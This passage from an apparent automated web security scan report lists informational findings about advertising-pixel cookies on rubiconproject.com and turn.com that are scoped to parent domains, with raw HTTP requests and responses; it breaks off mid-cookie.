rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1; expires=Thu, 11-Aug-2011 20:40:10 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /d.php?v=1224_1&cb=1310503209 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1; expires=Thu, 11-Aug-2011 20:40:10 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.34. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6811&cb=1310503191 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; rpb=733%3D1%264338%3D1%267100%3D1%266560%3D1%266643%3D1%266198%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C; put_2132=E3F32BD05A8DDF4D5646D79640088B

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C2%2C%2C; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.35. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
pf=S75Tx67zHlqJEqjM2EpYohyQmYHijzPhSURiZdWBt_mIAwkcA0x7pAMOQ8HX-tAoPwLHSpO1dFMRfUIqRRj7O8Bymq9LvAUz5_ne2Gc83NMHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_wu9pn5eTDfXokdHWgv_KeSzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25tnEZo1QLIx3A2B_Zq8odU2eiU467uOPvqZNUB0D-Z1h-Ye081m6oj-PGJfEQ6zkfS-V8iUpuZ8eodRw_lv4giezXN6TUonRbapcFN61G2o5g0IZKzKM_gBe3dP1E8FWQkM2fHCdNoeFK3r8z3rr_IMZGe2RqXjfUSv4PoS9BBdLPDTtDv5lO-7qW24wGeBDKGVRc1PUdvmcIfa70fwlgva-qLtly5tg-N0KJMS8LqLG_FacEC-83hgcFizrbdl-nuZiKc3wX7GiaI0EAPGkBVFePfSQ9yWsEBRfjuW4AHrUV5yIcO0NRkDqgMD2WAQJbF49vWqArbDJ0yoqifuBT8rwLezGBmoueobB2WMNaTxX7mxpMrQn0yES1bZJmLjjZIAkmIJxZ7xeYCj5l4gUPXVoOVFXuczpXr_MUqk_vCUthA8oixyElU3ANl1dD2qYov9BuL8l-AQdbit5mSqhcAge1f9v2DKdrS7tpbkEM0iqxaG6RswzxutKhO2dQbnqnli05-eD_Or7WQnS-BLdBqYTneq0zKFqU49VNcF9tmltxT1NaEJFhMivfKM5iLXXLqA3JaBVqauWRwqI8S_3Fn-BME0WtjmL-sTf3Nf93Yws_1ud7s0IRU8-3diGW0YihRapWhNVwJ8XDqeMYmLmHyM3mIk7c61SB7-8FMxyiC0cSExJSH89TrP0KtOzOBfTvxHeJg54zjksNPu1zZwzGr7u7c4UKg_yErLQJ0YMrQaTHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=homepage;ord=1294428578112.2744?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=Cx8u84bEVqWzcxtUTzqNJIC7M-V0K1YOk9JpwDx9iJ-IAwkcA0x7pAMOQ8HX-tAorSoba3JeN-xk7oapFFvy3VH1kGUf_WpfPdQV1CZyaCYHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB8lg8V6tRDdbWqGKQtvjC13uBmE_sR164gzV3uysVQ2QdRHkJfimLFS7WOEQG6pvwSUmGlP7plGVHEv-ZxqEZIrcXFzn59VucOMk1jaoS14k8c8mLEcBETNnyzMsneeF1syYFCrcdo0CAg55mHqrIrWWaQmkKSFcJcPgoCKH0sJxrIzPzQpSNx_CIsd1kfXDyjA2LDFvKhvZ1QEIEm7dh40PZjNQZ9Hd8MNm3JX-_S9NWe8WHK4NSvES3Z9QGGhu5Djvyp-YMlPmNhLTDojIlhjAjhS9eWzjsUsw9SoKtKpC8f_2RWCzOUGxk_Wz1rfZiWbxbJrTUf-aVzxXXriNIKNdAUsvGjo4dYjRw0gI-IRCZzMEukVXPbKwT_hFRpA_sDy9QeL7VpgT4tBIngc08Ws8FJltK3E8OgPtJy7Eoz0CJTXR5HKs3-hHShC6aRn6t8BfcQz0Dd86t8gXoPdMBgjtbxBbJEH3dHhKkO193ago_XUFSyzIOxm_x0ybvjW_DUjtRNJhmcOwDiyv8T_KQGDJqVkw-kV9dntkmeBLp5GGHSF_cakLXoawmQZ1OX2qeRpP5uEXb79RoRHLsAMGKSCy052Li315VZE1PNankBD1hqe7zgE_PsLCVtuTX5L-v-S8ut840ECOM1HdJH7s33O1_AQ4vnHmUUW7H59jc99zMgQ2O6JOMOztY9nPjblaNmLc_7YgA59y0a1NS04dNn076vc7MQQckLwsVvHiz-KvY1jzkP4PDCgK5hta8dPDsz-8OsEQFzGgGCvF0GIxS5Nbkr7--zZc_wQ6biDWOUTMZ5Aed2sucJPSwXllukkVa8jtckMV353gLOstRvTs7wASU8WY0U8nc5T3Av462s8LVUtne46_vE-foJkYKgxvmOzPagHCwrL0iRXFbrF0GCQ-kKVv-DNPSwltjGZxUewqaXFK9zRqsdpcWcQFcqw3510ThZFcxTfyigoCKl2TzGDotY3DBS9xlfQHYC5NuwXhkTkrJJbSXHXzZwKdWOAUKxEjjU_DLSyuHljlkbCfX905581fc21Bgmh6aLYPJTQgHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUq